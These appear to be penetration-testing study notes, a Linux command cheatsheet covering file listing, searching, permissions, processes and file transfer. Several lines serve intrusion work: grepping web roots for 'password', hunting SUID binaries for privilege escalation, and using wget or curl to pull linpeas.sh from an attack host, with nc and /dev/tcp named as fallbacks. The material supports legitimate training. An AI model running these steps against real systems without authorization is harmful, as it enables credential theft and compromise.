Linux Commands Cheatsheet
CPTS Notes
- Start Here
- General Framework
- Enumeration
- Enumeration with Nmap
- Reference
- Port References
- Linux Commands Cheatsheet
Listing Directories
List everything, long form, with hidden files and human sizes:
ls -lahWalk a tree without cd-ing around:
ls -R /etcFind files by name anywhere on the box:
find / -name "*.conf" 2>/dev/null
2>/dev/nulldrops the permission-denied noise so the hits are readable.
Reading Content
Print a whole file:
cat /etc/passwdPage through a long file (q to quit, / to search):
less /var/log/auth.logFirst or last lines of a file:
head -n 20 filetail -n 20 fileFollow a file as it grows:
tail -f /var/log/syslogSearching
Search inside files, recursively, with line numbers:
grep -rin "password" /var/www 2>/dev/nullPull just the matching part out of a stream:
grep -oP '\d+\.\d+\.\d+\.\d+' fileUsers and Permissions
Who am I and what groups am I in:
idWhat can I run as another user:
sudo -lFind files with the SUID bit set, a common privesc lead:
find / -perm -4000 -type f 2>/dev/nullProcesses and Network
Running processes:
ps auxListening ports and the process behind each:
ss -tulpnFile Transfer
Serve the current folder over HTTP to pull tools onto the box:
python3 -m http.server 8000Download a file from your attack host:
wget http://10.10.10.10:8000/linpeas.shcurl -O http://10.10.10.10:8000/linpeas.shIf
wgetandcurlare both missing,python3,nc, or/dev/tcpusually still work.